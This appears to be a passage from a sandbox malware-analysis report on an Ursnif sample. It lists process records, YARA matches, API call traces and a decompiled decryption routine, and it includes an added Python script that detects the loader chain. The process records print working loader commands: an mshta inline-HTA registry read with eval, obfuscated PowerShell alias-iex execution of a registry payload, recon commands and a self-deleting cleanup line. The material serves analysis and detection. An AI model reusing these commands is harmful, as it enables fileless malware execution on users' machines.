                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high

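Target IDs 19 and 20 are the registry-resident loader stage: mshta.exe runs an inline `about:<hta:application>` document whose script calls `WScript.Shell.RegRead()` on `HKCU\Software\AppDataLow\Software\Microsoft\<GUID>\TestLocal`, and the PowerShell it spawns hides `Get-ItemProperty` and `Invoke-Expression` behind `New-Alias` names before reading and executing the `UrlsReturn` value of the same key. The script below is an added example, not part of the Joe Sandbox report: it triages process command lines for that chain and carves the registry key and value name out of each hit. The first two records in `CMDLINES` are copied from the process records above; the third is a constructed benign control, and the technique names are this example's own.

```python
"""Triage process command lines for the Ursnif registry-resident loader stage.

Added example, not part of the sandbox report. Records 19 and 20 are the command
lines from this page's process records; record 99 is a constructed benign control.
Technique names are this example's own labels.
"""
import re

CMDLINES = [
    (19, r'''C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'''),
    (20, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'''),
    (99, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile Get-Process | Select-Object -First 5'''),  # constructed control
]

GUID = r"[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}"
# The key in either spelling: JScript ('HKCU\\\Software...' with doubled backslashes)
# or PowerShell ('HKCU:Software...'), optionally followed by the value name, which
# JScript gives as a trailing path element and PowerShell as a property access ").Name.
APPDATALOW_KEY = re.compile(
    r"HKCU[:\\]+Software\\+AppDataLow\\+Software\\+Microsoft\\+(?P<guid>" + GUID + r")"
    r'(?:\\+(?P<val_path>\w+)|"\)\.(?P<val_prop>\w+))?',
    re.IGNORECASE,
)
NEW_ALIAS = re.compile(r"new-alias\s+-name\s+(?P<name>\S+)\s+-value\s+(?P<target>[^\s;]+)", re.IGNORECASE)


def image_name(cmd):
    """Lower-cased basename of the executable at the start of a command line."""
    m = re.match(r'\s*"?(?P<path>[^"\s]+?\.exe)', cmd, re.IGNORECASE)
    return m["path"].rsplit("\\", 1)[-1].lower() if m else ""


def analyze(pid, cmd):
    """Return a finding dict for a suspicious command line, or None."""
    techniques, aliases = [], {}
    exe = image_name(cmd)
    low = cmd.lower()
    if exe == "mshta.exe" and "about:<hta:application>" in low and "regread(" in low:
        techniques.append("mshta_inline_hta_regread")
    if exe == "powershell.exe":
        for m in NEW_ALIAS.finditer(cmd):
            aliases[m["name"]] = m["target"].lower()
        for name, target in aliases.items():
            # An alias only matters if it is defined and then invoked in the same line.
            invoked = len(re.findall(rf"\b{re.escape(name)}\b", cmd)) >= 2
            if target in ("iex", "invoke-expression") and invoked:
                techniques.append("powershell_alias_iex")
            if target in ("gp", "get-itemproperty") and invoked:
                techniques.append("powershell_alias_registry_read")
    key = APPDATALOW_KEY.search(cmd)
    if key:
        techniques.append("appdatalow_guid_registry_payload")
    if not techniques:
        return None
    finding = {"pid": pid, "image": exe, "techniques": techniques, "aliases": aliases}
    if key:
        finding["registry_key"] = "HKCU\\Software\\AppDataLow\\Software\\Microsoft\\" + key["guid"].upper()
        finding["value_name"] = key["val_path"] or key["val_prop"]
    return finding


def analyze_all(records):
    """Run analyze() over (pid, cmdline) pairs and keep the hits."""
    return [f for pid, cmd in records if (f := analyze(pid, cmd)) is not None]


if __name__ == "__main__":
    for finding in analyze_all(CMDLINES):
        print(finding["pid"], finding["image"], ", ".join(finding["techniques"]))
        if "registry_key" in finding:
            print("   ", finding["registry_key"], "->", finding["value_name"])
```

The registry key and the two value names it yields (`TestLocal`, `UrlsReturn`) are the artefacts to carve from the `NTUSER.DAT` hive of an affected user; the alias map is kept in the finding so an analyst can see which obfuscated name stood for `iex` without re-reading the command line. The loaddll32/cmd/rundll32 records at the top of the process list would pass through `analyze()` untouched, which is the intended behaviour: they are the sandbox's own harness, not the malware's technique.
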
                                                        Target ID:21
                                                        Start time:16:19:26
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:22
                                                        Start time:16:19:38
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                                                        Imagebase:0x7ff7cb6d0000
                                                        File size:2739304 bytes
                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:moderate

                                                        Target ID:23
                                                        Start time:16:19:41
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
                                                        Imagebase:0x7ff7bf6d0000
                                                        File size:47280 bytes
                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Target ID:24
                                                        Start time:16:19:44
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\control.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\control.exe -h
                                                        Imagebase:0x7ff6a5e80000
                                                        File size:117760 bytes
                                                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        Target ID:25
                                                        Start time:16:19:45
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                                                        Imagebase:0x7ff7cb6d0000
                                                        File size:2739304 bytes
                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:moderate

                                                        Target ID:26
                                                        Start time:16:19:47
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
                                                        Imagebase:0x7ff7bf6d0000
                                                        File size:47280 bytes
                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Target ID:27
                                                        Start time:16:19:56
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff6f3b00000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:33
                                                        Start time:16:20:11
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:34
                                                        Start time:16:20:13
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:35
                                                        Start time:16:20:15
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping localhost -n 5
                                                        Imagebase:0x7ff689210000
                                                        File size:21504 bytes
                                                        MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:36
                                                        Start time:16:20:20
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6b45b0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security

                                                        Target ID:37
                                                        Start time:16:20:20
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                                                        Imagebase:0x7ff67f250000
                                                        File size:69632 bytes
                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                        Target ID:38
                                                        Start time:16:20:23
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:40
                                                        Start time:16:20:26
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:42
                                                        Start time:16:20:27
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\nslookup.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                        Imagebase:0x7ff713510000
                                                        File size:86528 bytes
                                                        MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:44
                                                        Start time:16:20:35
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:45
                                                        Start time:16:20:37
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6b45b0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                        Target ID:46
                                                        Start time:16:20:42
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:48
                                                        Start time:16:20:59
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1"
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:49
                                                        Start time:16:20:59
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6b45b0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security

                                                        Target ID:51
                                                        Start time:16:21:05
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language


                                                          Control-flow Graph
                                                          Legend: Executed / Not Executed (graph image not reproduced; the raw node and edge dump is omitted here)
                                                          Function 62800dc-6280125; the graph nodes reference the following API calls: RtlInitializeCriticalSection, memset, CreateMutexA, GetLastError, CloseHandle, GetUserNameA, RtlAllocateHeap, NtQueryInformationProcess, OpenProcess, GetShellWindow, GetWindowThreadProcessId, memcpy, CreateEventA, OpenEventA, SetEvent, wsprintfA, LoadLibraryA
                                                          APIs
                                                          • RtlInitializeCriticalSection.NTDLL(0629A428), ref: 062800FA
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • memset.NTDLL ref: 0628012B
                                                          • RtlInitializeCriticalSection.NTDLL(0689C2D0), ref: 0628013C
                                                            • Part of subcall function 06285261: RtlInitializeCriticalSection.NTDLL(0629A400), ref: 06285285
                                                            • Part of subcall function 06285261: RtlInitializeCriticalSection.NTDLL(0629A3E0), ref: 0628529B
                                                            • Part of subcall function 06285261: GetVersion.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062852AC
                                                            • Part of subcall function 06285261: GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062852E0
                                                            • Part of subcall function 06288452: RtlAllocateHeap.NTDLL(00000000,-00000003,773D9EB0), ref: 0628846C
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,06279100,?), ref: 06280165
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06280176
                                                          • CloseHandle.KERNEL32(000005C0,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 0628018A
                                                          • GetUserNameA.ADVAPI32(00000000,?), ref: 062801D3
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 062801E6
                                                          • GetUserNameA.ADVAPI32(00000000,?), ref: 062801FB
                                                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0628022B
                                                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06280240
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 0628024A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06280257
                                                          • GetShellWindow.USER32 ref: 06280272
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 06280279
                                                          • memcpy.NTDLL(0629A2F4,?,00000018,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062802B5
                                                          • CreateEventA.KERNEL32(0629A1E8,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,06279100,?), ref: 06280333
                                                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0628035D
                                                          • OpenEventA.KERNEL32(00100000,00000000,0689B9C8,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06280385
                                                          • CreateEventA.KERNEL32(0629A1E8,00000001,00000000,0689B9C8,?,?,?,?,?,?,?,06279100,?), ref: 0628039A
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062803A0
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06280438
                                                          • SetEvent.KERNEL32(?,0628C384,00000000,00000000,?,?,?,?,?,?,?,06279100,?), ref: 062804CE
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,0628C384), ref: 062804E3
                                                          • wsprintfA.USER32 ref: 06280513
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                                          • String ID:
                                                          • API String ID: 3929413950-0
                                                          • Opcode ID: 3e10d42222a89cae911f0a6903a92be626d450c1a5409d35e5c9f40cc8323fad
                                                          • Instruction ID: e1904cc28aaf054f8bd8e541b7cd8fc96e489d5f166bea1a185f03ae94dddda5
                                                          • Opcode Fuzzy Hash: 3e10d42222a89cae911f0a6903a92be626d450c1a5409d35e5c9f40cc8323fad
                                                          • Instruction Fuzzy Hash: BBC17EB0A213459FC7A0EF65FC8C91A7BE9FBC9710B14481DEA5697280C7799448CF71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
Control-flow graph of function 036D5FBB (rendered graph; node and edge data omitted)
                                                          C-Code - Quality: 58%
                                                          			E036D5FBB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				int _v8;
                                                          				long* _v12;
                                                          				int _v16;
                                                          				BYTE* _v20;
                                                          				long* _v24;
                                                          				void* _v39;
                                                          				char _v40;
                                                          				void _v56;
                                                          				int _v60;
                                                          				intOrPtr _v64;
                                                          				void _v67;
                                                          				char _v68;
                                                          				void* _t61;
                                                          				int _t68;
                                                          				signed int _t76;
                                                          				int _t79;
                                                          				int _t81;
                                                          				int _t85;
                                                          				long _t86;
                                                          				int _t90;
                                                          				signed int _t94;
                                                          				int _t101;
                                                          				BYTE* _t102;
                                                          				int _t103;
                                                          				void* _t104;
                                                          				void* _t105;
                                                          				void* _t106;
                                                          
                                                          				_t103 = __eax;
                                                          				_t94 = 6;
                                                          				_v68 = 0;
                                                          				memset( &_v67, 0, _t94 << 2);
                                                          				_t105 = _t104 + 0xc;
                                                          				asm("stosw");
                                                          				asm("stosb");
                                                          				_v40 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosw");
                                                          				asm("stosb");
                                                          				_t61 =  *0x36da0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                                          				if(_t61 == 0) {
                                                          					_a8 = GetLastError();
                                                          				} else {
                                                          					_t101 = 0x10;
                                                          					memcpy( &_v56, _a8, _t101);
                                                          					_t106 = _t105 + 0xc;
                                                          					_v60 = _t101;
                                                          					_v67 = 2;
                                                          					_v64 = 0x660e;
                                                          					_v68 = 8;
                                                          					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                                          					if(_t68 == 0) {
                                                          						_a8 = GetLastError();
                                                          					} else {
                                                          						_push(0);
                                                          						_push( &_v40);
                                                          						_push(1);
                                                          						_push(_v12);
                                                          						if( *0x36da0e4() == 0) {
                                                          							_a8 = GetLastError();
                                                          						} else {
                                                          							_t18 = _t103 + 0xf; // 0x10
                                                          							_t76 = _t18 & 0xfffffff0;
                                                          							if(_a4 != 0 && _t76 == _t103) {
                                                          								_t76 = _t76 + _t101;
                                                          							}
                                                          							_t102 = E036D6D63(_t76);
                                                          							_v20 = _t102;
                                                          							if(_t102 == 0) {
                                                          								_a8 = 8;
                                                          							} else {
                                                          								_v16 = 0;
                                                          								_a8 = 0;
                                                          								while(1) {
                                                          									_t79 = 0x10;
                                                          									_v8 = _t79;
                                                          									if(_t103 <= _t79) {
                                                          										_v8 = _t103;
                                                          									}
                                                          									memcpy(_t102, _a12, _v8);
                                                          									_t81 = _v8;
                                                          									_a12 = _a12 + _t81;
                                                          									_t103 = _t103 - _t81;
                                                          									_t106 = _t106 + 0xc;
                                                          									if(_a4 == 0) {
                                                          										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                                          									} else {
                                                          										_t85 =  *0x36da0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                                          									}
                                                          									if(_t85 == 0) {
                                                          										break;
                                                          									}
                                                          									_t90 = _v8;
                                                          									_v16 = _v16 + _t90;
                                                          									_t102 =  &(_t102[_t90]);
                                                          									if(_t103 != 0) {
                                                          										continue;
                                                          									} else {
                                                          										L17:
                                                          										 *_a16 = _v20;
                                                          										 *_a20 = _v16;
                                                          									}
                                                          									goto L21;
                                                          								}
                                                          								_t86 = GetLastError();
                                                          								_a8 = _t86;
                                                          								if(_t86 != 0) {
                                                          									E036D6C2C(_v20);
                                                          								} else {
                                                          									goto L17;
                                                          								}
                                                          							}
                                                          						}
                                                          						L21:
                                                          						CryptDestroyKey(_v12);
                                                          					}
                                                          					CryptReleaseContext(_v24, 0);
                                                          				}
                                                          				return _a8;
                                                          			}

                                                          APIs
                                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,036D24D8,00000001,036D58D7,00000000), ref: 036D5FF3
                                                          • memcpy.NTDLL(036D24D8,036D58D7,00000010,?,?,?,036D24D8,00000001,036D58D7,00000000,?,036D1D97,00000000,036D58D7,?,75BCC740), ref: 036D600C
                                                          • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 036D6035
                                                          • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 036D604D
                                                          • memcpy.NTDLL(00000000,75BCC740,059695B0,00000010), ref: 036D609F
